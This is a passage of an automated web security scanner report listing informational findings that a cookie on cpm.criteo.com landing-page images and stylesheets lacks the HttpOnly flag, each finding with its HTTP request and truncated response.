User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=94712387.1305478412.1.1.utmcsr=US_InsideFB|utmccn=InsideFB_US|utmcmd=display; 240plan=R915183294; __utma=94712387.631168667.1305478412.1305478412.1305478412.1; __utmc=94712387; __utmb=94712387.2.10.1305478412

Response

HTTP/1.1 404 Not Found
Set-Cookie: 240plan=R915183294; path=/; expires=Wed, 18-May-2011 04:54:04 GMT
Date: Sun, 15 May 2011 16:53:42 GMT
Server: Apache/2.2.X (OVH)
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
Content-Length: 209

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /favicon.ico was not found on this server.</p>
</body
...[SNIP]...

11.14. http://cpm.criteo.com/lp/css/general.css previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://cpm.criteo.com
Path:	/lp/css/general.css

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

240plan=R915183294; path=/; expires=Wed, 18-May-2011 04:54:04 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /lp/css/general.css HTTP/1.1
Host: cpm.criteo.com
Proxy-Connection: keep-alive
Referer: http://cpm.criteo.com/lp/web_us.html?utm_source=US_InsideFB&utm_medium=display&utm_campaign=InsideFB_US&content=200x200
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: 240plan=R915183294

Response

HTTP/1.1 200 OK
Set-Cookie: 240plan=R915183294; path=/; expires=Wed, 18-May-2011 04:54:04 GMT
Date: Sun, 15 May 2011 16:53:28 GMT
Server: Apache/2.2.X (OVH)
Last-Modified: Thu, 31 Mar 2011 12:18:05 GMT
ETag: "5613681-1445-49fc649121c4c"
Accept-Ranges: bytes
Content-Length: 5189
Content-Type: text/css

@charset "UTF-8";
/* CSS Document */

* {
   margin: 0px;
   padding: 0px;
}
body {
   font-family: Helvetica, Arial, sans-serif;
   font-size: 12px;
   text-decoration: none;
   background-image: url(../img/bckg
...[SNIP]...

11.15. http://cpm.criteo.com/lp/img/adw_header_us.jpg previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://cpm.criteo.com
Path:	/lp/img/adw_header_us.jpg

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

240plan=R915183294; path=/; expires=Wed, 18-May-2011 04:54:04 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /lp/img/adw_header_us.jpg HTTP/1.1
Host: cpm.criteo.com
Proxy-Connection: keep-alive
Referer: http://cpm.criteo.com/lp/web_us.html?utm_source=US_InsideFB&utm_medium=display&utm_campaign=InsideFB_US&content=200x200
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: 240plan=R915183294

Response

HTTP/1.1 200 OK
Set-Cookie: 240plan=R915183294; path=/; expires=Wed, 18-May-2011 04:54:04 GMT
Date: Sun, 15 May 2011 16:53:34 GMT
Server: Apache/2.2.X (OVH)
Last-Modified: Thu, 31 Mar 2011 12:17:59 GMT
ETag: "35d4572-1993b-49fc648b94e10"
Accept-Ranges: bytes
Content-Length: 104763
Content-Type: image/jpeg

......Exif..II*.................Ducky.......P......http://ns.adobe.com/xap/1.0/.<?xpacket begin="..." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.0-c0
...[SNIP]...

11.16. http://cpm.criteo.com/lp/img/bckgrd_gradient.png previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://cpm.criteo.com
Path:	/lp/img/bckgrd_gradient.png

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

240plan=R915183294; path=/; expires=Wed, 18-May-2011 04:54:04 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /lp/img/bckgrd_gradient.png HTTP/1.1
Host: cpm.criteo.com
Proxy-Connection: keep-alive
Referer: http://cpm.criteo.com/lp/web_us.html?utm_source=US_InsideFB&utm_medium=display&utm_campaign=InsideFB_US&content=200x200
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: 240plan=R915183294

Response

HTTP/1.1 200 OK
Set-Cookie: 240plan=R915183294; path=/; expires=Wed, 18-May-2011 04:54:04 GMT
Date: Sun, 15 May 2011 16:53:32 GMT
Server: Apache/2.2.X (OVH)
Last-Modified: Thu, 31 Mar 2011 12:17:59 GMT
ETag: "561368c-295-49fc648b87063"
Accept-Ranges: bytes
Content-Length: 661
Content-Type: image/png

.PNG
.
...IHDR.............4.......tEXtSoftware.Adobe ImageReadyq.e<...2PLTE..........................................................................................................................
...[SNIP]...

11.17. http://cpm.criteo.com/lp/img/booking_160600.jpg previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://cpm.criteo.com
Path:	/lp/img/booking_160600.jpg

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

240plan=R915183294; path=/; expires=Wed, 18-May-2011 04:54:04 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /lp/img/booking_160600.jpg HTTP/1.1
Host: cpm.criteo.com
Proxy-Connection: keep-alive
Referer: http://cpm.criteo.com/lp/web_us.html?utm_source=US_InsideFB&utm_medium=display&utm_campaign=InsideFB_US&content=200x200
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: 240plan=R915183294

Response

HTTP/1.1 200 OK
Set-Cookie: 240plan=R915183294; path=/; expires=Wed, 18-May-2011 04:54:04 GMT
Date: Sun, 15 May 2011 16:53:37 GMT
Server: Apache/2.2.X (OVH)
Last-Modified: Thu, 31 Mar 2011 12:17:59 GMT
ETag: "35d4579-b92-49fc648bbb414"
Accept-Ranges: bytes
Content-Length: 2962
Content-Type: image/jpeg

......JFIF.....d.d......Ducky.......<......Adobe.d.................... ... .......

.

..........................................................................................................4....
...[SNIP]...

11.18. http://cpm.criteo.com/lp/img/btn_2.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://cpm.criteo.com
Path:	/lp/img/btn_2.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

240plan=R915183294; path=/; expires=Wed, 18-May-2011 04:54:04 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /lp/img/btn_2.gif HTTP/1.1
Host: cpm.criteo.com
Proxy-Connection: keep-alive
Referer: http://cpm.criteo.com/lp/web_us.html?utm_source=US_InsideFB&utm_medium=display&utm_campaign=InsideFB_US&content=200x200
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: 240plan=R915183294

Response

HTTP/1.1 200 OK
Set-Cookie: 240plan=R915183294; path=/; expires=Wed, 18-May-2011 04:54:04 GMT
Date: Sun, 15 May 2011 16:53:34 GMT
Server: Apache/2.2.X (OVH)
Last-Modified: Thu, 31 Mar 2011 12:17:59 GMT
ETag: "5613697-3ba1-49fc648c0478e"
Accept-Ranges: bytes
Content-Length: 15265
Content-Type: image/gif

GIF89a..F...............................................................................................................................................................................................
...[SNIP]...

11.19. http://cpm.criteo.com/lp/img/callaway_160600.png previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://cpm.criteo.com
Path:	/lp/img/callaway_160600.png

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

240plan=R915183294; path=/; expires=Wed, 18-May-2011 04:54:04 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /lp/img/callaway_160600.png HTTP/1.1
Host: cpm.criteo.com
Proxy-Connection: keep-alive
Referer: http://cpm.criteo.com/lp/web_us.html?utm_source=US_InsideFB&utm_medium=display&utm_campaign=InsideFB_US&content=200x200
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: 240plan=R915183294

Response

HTTP/1.1 200 OK
Set-Cookie: 240plan=R915183294; path=/; expires=Wed, 18-May-2011 04:54:04 GMT
Date: Sun, 15 May 2011 16:53:37 GMT
Server: Apache/2.2.X (OVH)
Last-Modified: Thu, 31 Mar 2011 12:17:59 GMT
ETag: "35d4587-15a0-49fc648c2832b"
Accept-Ranges: bytes
Content-Length: 5536
Content-Type: image/png

.PNG
.
...IHDR.......4.....H)......tEXtSoftware.Adobe ImageReadyq.e<..."iTXtXML:com.adobe.xmp.....<?xpacket begin="..." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="A
...[SNIP]...

11.20. http://cpm.criteo.com/lp/img/de_flag.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://cpm.criteo.com
Path:	/lp/img/de_flag.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

240plan=R915183294; path=/; expires=Wed, 18-May-2011 04:54:04 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /lp/img/de_flag.gif HTTP/1.1
Host: cpm.criteo.com
Proxy-Connection: keep-alive
Referer: http://cpm.criteo.com/lp/web_us.html?utm_source=US_InsideFB&utm_medium=display&utm_campaign=InsideFB_US&content=200x200
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: 240plan=R915183294

Response

HTTP/1.1 200 OK
Set-Cookie: 240plan=R915183294; path=/; expires=Wed, 18-May-2011 04:54:04 GMT
Date: Sun, 15 May 2011 16:53:32 GMT
Server: Apache/2.2.X (OVH)
Last-Modified: Thu, 31 Mar 2011 12:18:00 GMT
ETag: "5613698-e1-49fc648c50349"
Accept-Ranges: bytes
Content-Length: 225
Content-Type: image/gif

GIF89a.......k*(...www..........yy....x..t.FOO....t..4).......ge......,00....n.bee..N..F.$..LJ.V..`...=.i....!.......,..........^..."a..` ..Zp.L.d.J...ah@.p(.D..H..Y8... .H.....Z.d..,..90.h...I....eN.
...[SNIP]...

11.21. http://cpm.criteo.com/lp/img/fr_flag.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://cpm.criteo.com
Path:	/lp/img/fr_flag.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

240plan=R915183294; path=/; expires=Wed, 18-May-2011 04:54:04 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /lp/img/fr_flag.gif HTTP/1.1
Host: cpm.criteo.com
Proxy-Connection: keep-alive
Referer: http://cpm.criteo.com/lp/web_us.html?utm_source=US_InsideFB&utm_medium=display&utm_campaign=InsideFB_US&content=200x200
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: 240plan=R915183294

Response

HTTP/1.1 200 OK
Set-Cookie: 240plan=R915183294; path=/; expires=Wed, 18-May-2011 04:54:04 GMT
Date: Sun, 15 May 2011 16:53:32 GMT
Server: Apache/2.2.X (OVH)
Last-Modified: Thu, 31 Mar 2011 12:18:00 GMT
ETag: "56136b5-e3-49fc648cb61bb"
Accept-Ranges: bytes
Content-Length: 227
Content-Type: image/gif

GIF89a.......#D..-.Zs.....20....JL..........nr..X......."......
........{......p....j...=Z...f.$U.5x.$#.....p!.......,..........`.e "b..b.D!..{.*.4Y..3...[....{.V.3 ..H%.y.%..f.z.f.. QB&{...`2.p8.....
...[SNIP]...

11.22. http://cpm.criteo.com/lp/img/it_flag.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://cpm.criteo.com
Path:	/lp/img/it_flag.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

240plan=R915183294; path=/; expires=Wed, 18-May-2011 04:54:04 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /lp/img/it_flag.gif HTTP/1.1
Host: cpm.criteo.com
Proxy-Connection: keep-alive
Referer: http://cpm.criteo.com/lp/web_us.html?utm_source=US_InsideFB&utm_medium=display&utm_campaign=InsideFB_US&content=200x200
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: 240plan=R915183294

Response

HTTP/1.1 200 OK
Set-Cookie: 240plan=R915183294; path=/; expires=Wed, 18-May-2011 04:54:04 GMT
Date: Sun, 15 May 2011 16:53:32 GMT
Server: Apache/2.2.X (OVH)
Last-Modified: Thu, 31 Mar 2011 12:18:00 GMT
ETag: "56136c1-e9-49fc648cd4e5a"
Accept-Ranges: bytes
Content-Length: 233
Content-Type: image/gif

GIF89a........cj...r.!\......l*.%(.GM+.d....17.(,D.t..E.."...'jF.BF...<.`x....8."&....................[.DJ|:=!.......,..........f.E..c.[.. AQ.q.+.x..P..x
...`t....`9......0,..gt:.^.Pi...D+.L....,.,.R)
...[SNIP]...

11.23. http://cpm.criteo.com/lp/img/logo_cpm.png previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://cpm.criteo.com
Path:	/lp/img/logo_cpm.png

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

240plan=R915183294; path=/; expires=Wed, 18-May-2011 04:54:04 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /lp/img/logo_cpm.png HTTP/1.1
Host: cpm.criteo.com
Proxy-Connection: keep-alive
Referer: http://cpm.criteo.com/lp/web_us.html?utm_source=US_InsideFB&utm_medium=display&utm_campaign=InsideFB_US&content=200x200
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: 240plan=R915183294

Response

HTTP/1.1 200 OK
Set-Cookie: 240plan=R915183294; path=/; expires=Wed, 18-May-2011 04:54:04 GMT
Date: Sun, 15 May 2011 16:53:34 GMT
Server: Apache/2.2.X (OVH)
Last-Modified: Thu, 31 Mar 2011 12:18:00 GMT
ETag: "56136c9-1b55-49fc648cf449e"
Accept-Ranges: bytes
Content-Length: 6997
Content-Type: image/png

.PNG
.
...IHDR..."...P.............tEXtSoftware.Adobe ImageReadyq.e<..."iTXtXML:com.adobe.xmp.....<?xpacket begin="..." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="A
...[SNIP]...

11.24. http://cpm.criteo.com/lp/img/overstock_us_160600.png previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://cpm.criteo.com
Path:	/lp/img/overstock_us_160600.png

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

240plan=R915183294; path=/; expires=Wed, 18-May-2011 04:54:04 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /lp/img/overstock_us_160600.png HTTP/1.1
Host: cpm.criteo.com
Proxy-Connection: keep-alive
Referer: http://cpm.criteo.com/lp/web_us.html?utm_source=US_InsideFB&utm_medium=display&utm_campaign=InsideFB_US&content=200x200
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: 240plan=R915183294

Response

HTTP/1.1 200 OK
Set-Cookie: 240plan=R915183294; path=/; expires=Wed, 18-May-2011 04:54:04 GMT
Date: Sun, 15 May 2011 16:53:37 GMT
Server: Apache/2.2.X (OVH)
Last-Modified: Thu, 31 Mar 2011 12:18:01 GMT
ETag: "35d4592-4b7-49fc648d72559"
Accept-Ranges: bytes
Content-Length: 1207
Content-Type: image/png

.PNG
.
...IHDR.......4.....H)......tEXtSoftware.Adobe ImageReadyq.e<....PLTE....%&.$%.! ._c......./2..................@@@.....................::: .mrIII.........ppp...aaa...............\\\........
...[SNIP]...

11.25. http://cpm.criteo.com/lp/img/puce_1.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://cpm.criteo.com
Path:	/lp/img/puce_1.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

240plan=R915183294; path=/; expires=Wed, 18-May-2011 04:54:04 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /lp/img/puce_1.gif HTTP/1.1
Host: cpm.criteo.com
Proxy-Connection: keep-alive
Referer: http://cpm.criteo.com/lp/web_us.html?utm_source=US_InsideFB&utm_medium=display&utm_campaign=InsideFB_US&content=200x200
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: 240plan=R915183294

Response

HTTP/1.1 200 OK
Set-Cookie: 240plan=R915183294; path=/; expires=Wed, 18-May-2011 04:54:04 GMT
Date: Sun, 15 May 2011 16:53:37 GMT
Server: Apache/2.2.X (OVH)
Last-Modified: Thu, 31 Mar 2011 12:18:01 GMT
ETag: "56136f3-127-49fc648d93b48"
Accept-Ranges: bytes
Content-Length: 295
Content-Type: image/gif

GIF89a ........... ........r.....=................. .. ...........W...........P..2.....2.....~..`........J..L!.......,.... ...... .di.h....LlL.TU.2+P.......9..(.b...p...I%..R...9F...x....H0y..\s..|N.
...[SNIP]...

11.26. http://cpm.criteo.com/lp/img/quote_1_uk.jpg previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://cpm.criteo.com
Path:	/lp/img/quote_1_uk.jpg

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

240plan=R915183294; path=/; expires=Wed, 18-May-2011 04:54:04 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /lp/img/quote_1_uk.jpg HTTP/1.1
Host: cpm.criteo.com
Proxy-Connection: keep-alive
Referer: http://cpm.criteo.com/lp/web_us.html?utm_source=US_InsideFB&utm_medium=display&utm_campaign=InsideFB_US&content=200x200
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: 240plan=R915183294

Response

HTTP/1.1 200 OK
Set-Cookie: 240plan=R915183294; path=/; expires=Wed, 18-May-2011 04:54:04 GMT
Date: Sun, 15 May 2011 16:53:37 GMT
Server: Apache/2.2.X (OVH)
Last-Modified: Thu, 31 Mar 2011 12:18:01 GMT
ETag: "561370a-88b2-49fc648ddf039"
Accept-Ranges: bytes
Content-Length: 34994
Content-Type: image/jpeg

......JFIF.....d.d......Ducky.......P......http://ns.adobe.com/xap/1.0/.<?xpacket begin="..." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.0-c060 61.13
...[SNIP]...

11.27. http://cpm.criteo.com/lp/img/quote_2_uk.jpg previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://cpm.criteo.com
Path:	/lp/img/quote_2_uk.jpg

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

240plan=R915183294; path=/; expires=Wed, 18-May-2011 04:54:04 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /lp/img/quote_2_uk.jpg HTTP/1.1
Host: cpm.criteo.com
Proxy-Connection: keep-alive
Referer: http://cpm.criteo.com/lp/web_us.html?utm_source=US_InsideFB&utm_medium=display&utm_campaign=InsideFB_US&content=200x200
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: 240plan=R915183294

Response

HTTP/1.1 200 OK
Set-Cookie: 240plan=R915183294; path=/; expires=Wed, 18-May-2011 04:54:04 GMT
Date: Sun, 15 May 2011 16:53:39 GMT
Server: Apache/2.2.X (OVH)
Last-Modified: Thu, 31 Mar 2011 12:18:01 GMT
ETag: "561371b-6747-49fc648e1d107"
Accept-Ranges: bytes
Content-Length: 26439
Content-Type: image/jpeg

......JFIF.....d.d......Ducky.......P......Adobe.d.....................................................

...................... .. . .............................................................
...[SNIP]...

11.28. http://cpm.criteo.com/lp/img/quote_3_uk.jpg previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://cpm.criteo.com
Path:	/lp/img/quote_3_uk.jpg

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

240plan=R915183294; path=/; expires=Wed, 18-May-2011 04:54:04 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /lp/img/quote_3_uk.jpg HTTP/1.1
Host: cpm.criteo.com
Proxy-Connection: keep-alive
Referer: http://cpm.criteo.com/lp/web_us.html?utm_source=US_InsideFB&utm_medium=display&utm_campaign=InsideFB_US&content=200x200
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: 240plan=R915183294

Response

HTTP/1.1 200 OK
Set-Cookie: 240plan=R915183294; path=/; expires=Wed, 18-May-2011 04:54:04 GMT
Date: Sun, 15 May 2011 16:53:39 GMT
Server: Apache/2.2.X (OVH)
Last-Modified: Thu, 31 Mar 2011 12:18:02 GMT
ETag: "5613727-7b29-49fc648e61557"
Accept-Ranges: bytes
Content-Length: 31529
Content-Type: image/jpeg

......JFIF.....d.d......Ducky.......P......Adobe.d.....................................................

...................... .. . .............................................................
...[SNIP]...

11.29. http://cpm.criteo.com/lp/img/sep_bas.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://cpm.criteo.com
Path:	/lp/img/sep_bas.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

240plan=R915183294; path=/; expires=Wed, 18-May-2011 04:54:04 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /lp/img/sep_bas.gif HTTP/1.1
Host: cpm.criteo.com
Proxy-Connection: keep-alive
Referer: http://cpm.criteo.com/lp/web_us.html?utm_source=US_InsideFB&utm_medium=display&utm_campaign=InsideFB_US&content=200x200
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: 240plan=R915183294

Response

HTTP/1.1 200 OK
Set-Cookie: 240plan=R915183294; path=/; expires=Wed, 18-May-2011 04:54:04 GMT
Date: Sun, 15 May 2011 16:53:34 GMT
Server: Apache/2.2.X (OVH)
Last-Modified: Thu, 31 Mar 2011 12:18:02 GMT
ETag: "561372a-435-49fc648e81fb6"
Accept-Ranges: bytes
Content-Length: 1077
Content-Type: image/gif

GIF89a.......................................................................................................!.......,........... .di.h..l..p,.tm.x..|....pH,....r.l:...tJ.Z...v......xL.....z.n....|N.
...[SNIP]...

11.30. http://cpm.criteo.com/lp/img/sep_centre.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://cpm.criteo.com
Path:	/lp/img/sep_centre.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

240plan=R915183294; path=/; expires=Wed, 18-May-2011 04:54:04 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /lp/img/sep_centre.gif HTTP/1.1
Host: cpm.criteo.com
Proxy-Connection: keep-alive
Referer: http://cpm.criteo.com/lp/web_us.html?utm_source=US_InsideFB&utm_medium=display&utm_campaign=InsideFB_US&content=200x200
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: 240plan=R915183294

Response

HTTP/1.1 200 OK
Set-Cookie: 240plan=R915183294; path=/; expires=Wed, 18-May-2011 04:54:04 GMT
Date: Sun, 15 May 2011 16:53:34 GMT
Server: Apache/2.2.X (OVH)
Last-Modified: Thu, 31 Mar 2011 12:18:02 GMT
ETag: "5613732-10c-49fc648e9d7f3"
Accept-Ranges: bytes
Content-Length: 268
Content-Type: image/gif

GIF89a...............................!.......,...............0.I..8....`(.di.h..l..p,.tm.x..|....pH,....r.l:...tJ.Z...v..z...xL.....z.n....|N.....~......................c..............................
...[SNIP]...

11.31. http://cpm.criteo.com/lp/img/sep_haut.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://cpm.criteo.com
Path:	/lp/img/sep_haut.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

240plan=R915183294; path=/; expires=Wed, 18-May-2011 04:54:04 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /lp/img/sep_haut.gif HTTP/1.1
Host: cpm.criteo.com
Proxy-Connection: keep-alive
Referer: http://cpm.criteo.com/lp/web_us.html?utm_source=US_InsideFB&utm_medium=display&utm_campaign=InsideFB_US&content=200x200
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: 240plan=R915183294

Response

HTTP/1.1 200 OK
Set-Cookie: 240plan=R915183294; path=/; expires=Wed, 18-May-2011 04:54:04 GMT
Date: Sun, 15 May 2011 16:53:34 GMT
Server: Apache/2.2.X (OVH)
Last-Modified: Thu, 31 Mar 2011 12:18:02 GMT
ETag: "5613734-454-49fc648ec2455"
Accept-Ranges: bytes
Content-Length: 1108
Content-Type: image/gif

GIF89a.......................................................................................................!.......,............!.di.h..l..p,.tm.x..|....pH,....R.h:...tJ.Z...v..z...xL.....z.n....|N.
...[SNIP]...

